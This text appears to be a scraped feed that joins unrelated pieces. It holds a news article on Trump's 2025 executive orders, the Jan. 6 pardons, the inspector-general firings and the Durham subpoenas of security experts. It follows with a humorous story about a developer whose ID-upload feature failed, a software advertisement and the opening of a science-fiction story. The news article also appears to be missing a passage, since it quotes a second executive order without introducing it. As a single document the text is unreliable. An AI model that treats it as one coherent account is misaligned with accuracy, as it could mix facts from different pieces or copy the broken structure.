Prior to the election, President Trump frequently vowed to use a second term to exact retribution against his perceived enemies. Part of that promise materialized in an executive order Trump issued last week titled “Ending the Weaponization of the Federal Government,” which decried “an unprecedented, third-world weaponization of prosecutorial power to upend the democratic process,” in the prosecution of more than 1,500 people who invaded the U.S. Capitol on Jan. 6, 2021.
On Jan. 21, Trump commuted the sentences of several leaders of the Proud Boys and Oath Keepers who were convicted of seditious conspiracy. He also issued “a full, complete and unconditional pardon to all other individuals convicted of offenses related to events that occurred at or near the United States Capitol on January 6, 2021,” which include those who assaulted law enforcement officers.
The New York Times reports “the language of the document suggests — but does not explicitly state — that the Trump administration review will examine the actions of local district attorneys or state officials, such as the district attorneys in Manhattan or Fulton County, Ga., or the New York attorney general, all of whom filed cases against President Trump.”
“Over the last 4 years, the previous administration trampled free speech rights by censoring Americans’ speech on online platforms, often by exerting substantial coercive pressure on third parties, such as social media companies, to moderate, deplatform, or otherwise suppress speech that the Federal Government did not approve,” the Trump administration alleged. “Under the guise of combatting ‘misinformation,’ ‘disinformation,’ and ‘malinformation,’ the Federal Government infringed on the constitutionally protected speech rights of American citizens across the United States in a manner that advanced the Government’s preferred narrative about significant matters of public debate.”
Both of these executive orders have potential implications for security, privacy and civil liberties activists who have sought to track conspiracy theories and raise awareness about disinformation efforts on social media coming from U.S. adversaries.
In the wake of the 2020 election, Republicans created the House Judiciary Committee’s Select Subcommittee on the Weaponization of the Federal Government. Led by GOP Rep. Jim Jordan of Ohio, the committee’s stated purpose was to investigate alleged collusion between the Biden administration and tech companies to unconstitutionally shut down political speech.
The GOP committee focused much of its ire at members of the short-lived Disinformation Governance Board, an advisory board to DHS created in 2022 (the “combating misinformation, disinformation, and malinformation” quote from Trump’s executive order is a reference to the board’s stated mission). Conservative groups seized on social media posts made by the director of the board, who resigned after facing death threats. The board was dissolved by DHS soon after.
In his first administration, President Trump created a special prosecutor to probe the origins of the FBI’s investigation into possible collusion between the Trump campaign and Russian operatives seeking to influence the 2016 election. Part of that inquiry examined evidence gathered by some of the world’s most renowned cybersecurity experts who identified frequent and unexplained communications between an email server used by the Trump Organization and Alfa Bank, one of Russia’s largest financial institutions.
Trump’s Special Prosecutor John Durham later subpoenaed and/or deposed dozens of security experts who’d collected, viewed or merely commented on the data. Similar harassment and deposition demands would come from lawyers for Alfa Bank. Durham ultimately indicted Michael Sussman, the former federal cybercrime prosecutor who reported the oddity to the FBI. Sussman was acquitted in May 2022. Last week, Trump appointed Durham to lead the U.S. attorney’s office in Brooklyn, NY.
Quinta Jurecic at Lawfarenotes that while the executive actions are ominous, they are also vague, and could conceivably generate either a campaign of retaliation, or nothing at all.
“The two orders establish that there will be investigations but leave open the questions of what kind of investigations, what will be investigated, how long this will take, and what the consequences might be,” Jurecic wrote. “It is difficult to draw firm conclusions as to what to expect. Whether this ambiguity is intentional or the result of sloppiness or disagreement within Trump’s team, it has at least one immediate advantage as far as the president is concerned: generating fear among the broad universe of potential subjects of those investigations.”
On Friday, Trump moved to fire at least 17 inspectors general, the government watchdogs who conduct audits and investigations of executive branch actions, and who often uncover instances of government waste, fraud and abuse. Lawfare’s Jack Goldsmith argues that the removals are probably legal even though Trump defied a 2022 law that required congressional notice of the terminations, which Trump did not give.
“Trump probably acted lawfully, I think, because the notice requirement is probably unconstitutional,” Goldsmith wrote. “The real bite in the 2022 law, however, comes in the limitations it places on Trump’s power to replace the terminated IGs—limitations that I believe are constitutional. This aspect of the law will make it hard, but not impossible, for Trump to put loyalists atop the dozens of vacant IG offices around the executive branch. The ultimate fate of IG independence during Trump 2.0, however, depends less on legal protections than on whether Congress, which traditionally protects IGs, stands up for them now. Don’t hold your breath.”
Among the many Biden administration executive orders revoked by President Trump last week was an action from December 2021 establishing the United States Council on Transnational Organized Crime, which is charged with advising the White House on a range of criminal activities, including drug and weapons trafficking, migrant smuggling, human trafficking, cybercrime, intellectual property theft, money laundering, wildlife and timber trafficking, illegal fishing, and illegal mining.
So far, the White House doesn’t appear to have revoked an executive order that former President Biden issued less than a week before President Trump took office. On Jan. 16, 2025, Biden released a directive that focused on improving the security of federal agencies and contractors, and giving the government more power to sanction the hackers who target critical infrastructure.
Denise's company formed a new team. They had a lot of low-quality legacy code, and it had gotten where it was, in terms of quality, because the company had no real policy or procedures which encouraged good code. "If it works, it ships," was basically the motto. They wanted to change that, and the first step was creating a new software team to kick of green-field projects with an eye towards software craftsmanship.
Enter Jack. Jack was the technical lead, and Jack had a vision of good software. This started with banning ORM-generated database models. But it also didn't involve writing raw SQL either- Jack hand-forged their tables with the Visual Table Designer feature of SQL Server Management Studio.
"The advantage," he happily explained to Denise, "is that we can then just generate our ORM layer right off the database. And when the database changes, we just regenerate- it's way easier than trying to build migrations."
"Right, but even if we're not using ORM migrations, we still want to write migration scripts for our changes to our database. We need to version control them and test them."
"We test them by making the change and running the test suite," Jack said.
And what a test suite it was. There was 100% test coverage. There was test coverage on simple getter/setter methods. There was test coverage on the data transfer objects, which had no methods but getters and setters. There were unit tests for functions that did nothing more than dispatch to built-in functions. Many of the tests just verified that a result was returned, but never checked what the result was. There were unit tests on the auto-generated ORM objects.
The last one, of course, meant that any time they changed the database, there was a significant risk that the test suite would fail on code that they hadn't written. Not only did they need to update the code consuming the data, the tests on that code, they also had to update the tests on the autogenerated code.
Jack's magnum opus, in the whole thing, was that he designed the software with a plugin architecture. Instead of tightly coupling different implementations of various modules together, there was a plugin loader which could fetch an assembly at runtime and use that. Unfortunately, while the whole thing could have plugins, all of the abstractions leaked across module boundaries so you couldn't reasonably swap out plugins without rewriting the entire application. Instead of making a modular architecture, Jack just made starting the application wildly inefficient.
Denise and her team brought their concerns to management. Conversations were had, and it fell upon Jack to school them all. Cheerfully, he said: "Look, not everyone gets software craftsmanship, so I'm going to implement a new feature as sort of a reference implementation. If you follow the pattern I lay out, you'll have an easy time building good code!"
The new feature was an identity verification system which called for end users to upload photographs of their IDs- drivers' licenses, passports, etc. It was not a feature which should have had one developer driving the whole thing, and Jack was not implementing the entire lifecycle of data management for this; instead he was just implementing the upload feature.
Jack pushed it through, out and up into production. Somehow, he short-cut past any code reviews, feature reviews, or getting anyone else to test it. He went straight to a demo in production, where he uploaded his passport and license. "So, there you go, a reference implementation for you all."
Denise went ahead and ran her own test, with a synthetic ID for a test user, which didn't contain any real humans' information. The file upload crashed. In fact, in an ultimate variation of "it works on my machine," the only person who ever successfully used the upload feature was Jack. Of course, since the upload never worked, none of the other features, like retention policies, ever got implemented either.
Now, this didn't mean the company couldn't do identity verification- they had an existing system, so they just kept redirecting users to that, instead of the new version, which didn't work.
Jack went on to other features, though, because he was a clever craftsman and needed to bring his wisdom to the rest of their project. So the file upload just languished, never getting fixed. Somehow, this wasn't Jack's fault, management didn't hold him responsible, and everyone was still expected to follow the patterns he used in designing the feature to guide their own work.
Until, one day, the system was breached by hackers. This, surprisingly, had nothing to do with Jack's choices- one of the admins got phished. This meant that the company needed to send out an announcement, informing users that they were breached. "We deeply regret the breach in our identity verification system, but can confirm that no personal data for any of our customers was affected."
Jack, of course, was not a customer, so he got a private disclosure that his passport and ID had been compromised.
[Advertisement]
Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.
Author: Julian Miles, Staff Writer “Does it ever end?” Bruce rises slightly and turns to stare at Lilimya. “If you don’t pay attention, it’ll end sooner than y-” He explodes from the waist up, a wave of heat momentarily turning snowflakes to steam. Lilimya is blown backwards, splinters of bone peppering her armour amidst a […]